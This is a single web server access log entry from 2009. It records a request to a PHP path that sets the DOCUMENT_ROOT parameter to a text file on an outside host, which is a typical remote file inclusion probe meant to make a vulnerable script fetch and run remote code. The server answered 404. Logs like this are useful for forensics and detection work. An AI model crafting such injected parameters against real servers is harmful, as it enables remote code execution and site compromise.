67.19.107.26 - - [03/Jun/2009:20:47:26 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://lilleauxenfants.free.fr/fx29id.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
